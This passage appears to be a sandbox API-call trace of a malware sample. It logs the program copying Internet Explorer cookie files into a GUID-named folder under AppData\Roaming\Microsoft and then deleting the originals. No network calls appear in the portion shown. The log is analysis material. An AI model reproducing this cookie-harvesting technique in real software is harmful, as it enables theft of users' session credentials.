returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0251.759] StrChrW (lpStart="1L3KU69N.txt", wMatch=0x74c005c) returned 0x0 [0251.759] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="1L3KU69N.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\1L3KU69N.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\1L3KU69N.txt" [0251.759] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\1L3KU69N.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\1l3ku69n.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\1L3KU69N.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\1l3ku69n.txt"), bFailIfExists=0) returned 1 [0251.763] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\1L3KU69N.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\1l3ku69n.txt")) returned 1 [0251.765] lstrlenW (lpString="Low\\1LFQZEOH.txt") returned 16 [0251.765] lstrlenW (lpString="\\cookie.ie") returned 10 [0251.765] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned 86 [0251.765] lstrcpyW (in: lpString1=0x79c8960, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.765] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.765] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.765] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.765] StrChrW (lpStart="Low\\1LFQZEOH.txt", wMatch=0x74c005c) returned="\\1LFQZEOH.txt" [0251.765] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0251.765] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0251.765] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0251.765] StrChrW (lpStart="1LFQZEOH.txt", wMatch=0x74c005c) returned 0x0 [0251.765] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="1LFQZEOH.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\1LFQZEOH.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\1LFQZEOH.txt" [0251.765] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\1LFQZEOH.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\1lfqzeoh.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\1LFQZEOH.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\1lfqzeoh.txt"), bFailIfExists=0) returned 1 [0251.786] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\1LFQZEOH.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\1lfqzeoh.txt")) returned 1 [0251.787] lstrcpyW (in: lpString1=0x79c8960, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.787] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.787] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.787] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.787] StrChrW (lpStart="Low\\1LLUY7B7.txt", wMatch=0x74c005c) returned="\\1LLUY7B7.txt" [0251.787] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0251.787] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0251.787] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0251.787] StrChrW (lpStart="1LLUY7B7.txt", wMatch=0x74c005c) returned 0x0 [0251.787] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="1LLUY7B7.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\1LLUY7B7.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\1LLUY7B7.txt" [0251.787] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\1LLUY7B7.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\1lluy7b7.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\1LLUY7B7.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\1lluy7b7.txt"), bFailIfExists=0) returned 1 [0251.792] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\1LLUY7B7.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\1lluy7b7.txt")) returned 1 [0251.794] lstrcpyW (in: lpString1=0x7aaeea0, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.794] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.794] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.794] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.794] StrChrW (lpStart="Low\\1UYN2RFY.txt", wMatch=0x74c005c) returned="\\1UYN2RFY.txt" [0251.794] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0251.794] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0251.794] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0251.794] StrChrW (lpStart="1UYN2RFY.txt", wMatch=0x74c005c) returned 0x0 [0251.794] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="1UYN2RFY.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\1UYN2RFY.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\1UYN2RFY.txt" [0251.794] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\1UYN2RFY.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\1uyn2rfy.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\1UYN2RFY.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\1uyn2rfy.txt"), bFailIfExists=0) returned 1 [0251.849] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\1UYN2RFY.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\1uyn2rfy.txt")) returned 1 [0251.850] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.850] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.850] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.850] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.850] StrChrW (lpStart="Low\\23JC2UTD.txt", wMatch=0x74c005c) returned="\\23JC2UTD.txt" [0251.850] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0251.850] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0251.850] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0251.850] StrChrW (lpStart="23JC2UTD.txt", wMatch=0x74c005c) returned 0x0 [0251.850] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="23JC2UTD.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\23JC2UTD.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\23JC2UTD.txt" [0251.850] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\23JC2UTD.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\23jc2utd.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\23JC2UTD.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\23jc2utd.txt"), bFailIfExists=0) returned 1 [0251.855] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\23JC2UTD.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\23jc2utd.txt")) returned 1 [0251.856] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.856] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.856] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.856] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.856] StrChrW (lpStart="Low\\2EQ4E2OJ.txt", wMatch=0x74c005c) returned="\\2EQ4E2OJ.txt" [0251.856] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0251.856] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0251.856] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0251.856] StrChrW (lpStart="2EQ4E2OJ.txt", wMatch=0x74c005c) returned 0x0 [0251.856] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="2EQ4E2OJ.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\2EQ4E2OJ.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\2EQ4E2OJ.txt" [0251.856] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\2EQ4E2OJ.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\2eq4e2oj.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\2EQ4E2OJ.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\2eq4e2oj.txt"), bFailIfExists=0) returned 1 [0251.860] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\2EQ4E2OJ.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\2eq4e2oj.txt")) returned 1 [0251.861] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: 